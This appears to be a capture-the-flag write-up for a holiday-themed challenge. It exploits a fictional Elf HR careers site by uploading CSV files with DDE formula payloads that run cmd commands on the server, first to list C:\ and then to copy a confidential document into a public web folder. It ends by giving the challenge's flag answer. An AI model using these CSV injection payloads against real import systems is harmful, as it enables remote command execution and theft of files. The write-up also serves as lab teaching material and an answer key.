HR Incident Response

Objective #7
Elf HR logo

Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website and fetch the document C:\candidate_evaluation.docx. Which terrorist organization is secretly supported by the job applicant whose name begins with "K."

For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.

Sparkle Redberry

CSV Injection Talk hint from Sparkle Redberry
Somehow Brian Hostetler is giving a talk on CSV injection WHILE he's giving a talk on Trufflehog. Whatta' guy!

OWASP on CSV Injection hint from Sparkle Redberry
OWASP CSV Injection Page

I wonder if Tangle Coalbox has taken a good look at his own employee import system.
It takes CSV files as imports. That certainly can expedite a process, but there's danger to be had.
I'll bet, with the right malicious input, some naughty actor could exploit a vulnerability there.
I'm sure the danger can be mitigated. OWASP has guidance on what not to allow with such uploads.

Opening Elf HR presents opportunity to upload CSV file.

initial Elf HR web page

Opening non-existing URL, e.g. https://careers.kringlecastle.com/elfelfelf returns 404 error code and reveals discloses information about file locations.

404 error on Elf HR web page

Combining these two things, let's try a simple CSV injection to execute a command. 

=cmd|'/C DIR C:\ C:\careerportal\resources\public\temp.txt'!A1

Navigating to https://careers.kringlecastle.com/public/temp.txt reveals that it worked! 

    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        12/6/2018   7:42 PM                careerportal                                                          
d-----        10/9/2018   7:42 PM                PerfLogs                                                              
d-r---       10/23/2018   6:26 PM                Program Files                                                         
d-----       10/23/2018   5:33 PM                Program Files (x86)                                                   
da----       10/23/2018   6:08 PM                Python27                                                              
d-r---       10/23/2018   7:06 PM                Users                                                                 
d-----       12/13/2018   4:20 AM                Windows                                                               
-a----        12/7/2018   7:57 PM         363073 candidate_evaluation.docx

Exfiltrate C:\candidate_evaluation.docx by copying it into publicly accessible directory. 

=cmd|'/C COPY C:\candidate_evaluation.docx C:\careerportal\resources\public\'!A1

Now it can be downloaded just by browsing to https://careers.kringlecastle.com/public/candidate_evaluation.docx.

In candidate_evaluation.docx document there is comment about candidate Krampus:

Krampus’s career summary included experience hardening decade old attack vectors, and lacked updated skills to meet the challenges of attacks against our beloved Holidays. Furthermore, there is intelligence from the North Pole this elf is linked to cyber terrorist organization Fancy Beaver who openly provides technical support to the villains that attacked our Holidays last year. We owe it to Santa to find, recruit, and put forward trusted candidates with the right skills and ethical character to meet the challenges that threaten our joyous season.

Answer to this objective is Fancy Beaver.